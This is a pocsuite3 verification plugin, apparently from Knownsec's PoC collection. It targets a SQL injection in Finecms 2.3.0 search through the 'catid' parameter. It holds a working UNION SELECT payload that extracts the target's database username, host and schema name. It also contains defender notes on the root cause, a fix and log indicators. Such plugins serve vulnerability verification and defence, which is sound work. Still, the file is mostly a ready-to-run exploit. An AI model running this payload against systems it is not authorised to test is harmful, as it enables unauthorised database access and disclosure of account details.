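"""pocsuite3 verification plugin for the Finecms 2.3.0 ``catid`` SQL injection.

According to ``desc`` and ``references`` below, the keyword-search feature of
Finecms 2.3.0 does not filter the ``catid`` request parameter before it
reaches the database layer.  This plugin sends one GET request and reports
the target as vulnerable when the response echoes back a marker-delimited
string produced by the database.

Defender notes:
    * Root cause is missing input filtering on ``catid``.  It is presumably
      a numeric category id, so a server-side integer cast or a parameterized
      query would close the hole (confirm against the application source).
    * A run of this check is visible in web access logs as a request to
      ``/book/index.php?c=search`` whose ``catid`` value is not purely
      numeric, and in responses containing the ``4kwe`` / ``4k7a`` / ``we5q``
      marker tokens.

Plugin development guide:
    https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
Project site:
    http://pocsuite.org
"""
import re

from pocsuite3.api import Output, POCBase, register_poc, requests


class DemoPOC(POCBase):
    """Check a target for the Finecms 2.3.0 search ``catid`` SQL injection."""

    # --- pocsuite3 metadata -------------------------------------------------
    vulID = '1281'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-05-17'
    createDate = '2014-05-19'
    updateDate = '2014-05-19'
    references = ['http://wooyun.org/bugs/wooyun-2014-059753']
    # English: "Finecms 2.3.0 /search_model.php SQL injection vulnerability POC"
    name = 'Finecms 2.3.0 /search_model.php SQL注入漏洞 POC'
    appPowerLink = 'http://dayrui.com/'
    appName = 'Finecms'
    appVersion = 'v2.3.0#'
    vulType = 'SQL Injection'
    # English: "During keyword search Finecms does not properly filter the
    # catid field, which leads to SQL injection."
    desc = ''' Finecms在进行关键词查询时,对catid字段没有做好过滤,导致SQLi '''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Send the probe request and report what the response reveals.

        Returns:
            The ``Output`` object built by ``parse_output``.  On a positive
            match ``result['Database']`` holds ``Hostname``, ``Username`` and
            ``DBname``; otherwise ``result`` stays empty and the output is
            marked as failed.

        Note:
            A positive result contains the database account and schema name
            of the target, so scan output should be handled as sensitive.
        """
        result = {}
        urli = self.url + '/book/index.php?c=search&catid=3'
        # The hex literals decode to the marker tokens matched below:
        # 0x3a3a = "::", 0x346B7765 = "4kwe", 0x346B3761 = "4k7a",
        # 0x77653571 = "we5q".
        sql_get = "%20union%20all%20select%20concat_ws(0x3a3a,0x346B7765,user(),0x346B3761,database(),0x77653571)%23"
        content = requests.get(urli + sql_get).text
        u_h_p = re.findall('4kwe::(.*?)::4k7a::(.*?)::we5q', content)
        if u_h_p:
            (u_h, DBname) = u_h_p[0]
            # Split "user@host" on the last '@'.  The previous rfind()-based
            # slicing returned -1 when no '@' was present, which dropped the
            # last character of the user name and copied the whole string
            # into Hostname.
            Username, separator, Hostname = u_h.rpartition('@')
            if not separator:
                Username, Hostname = u_h, ''
            result['Database'] = {}
            result['Database']['Hostname'] = Hostname
            result['Database']['Username'] = Username
            result['Database']['DBname'] = DBname
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Attack mode is identical to verify mode for this plugin."""
        return self._verify()

    def _shell(self):
        """Shell mode is not implemented."""
        pass


register_poc(DemoPOC)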
暂无官方解决方案
暂无防护方案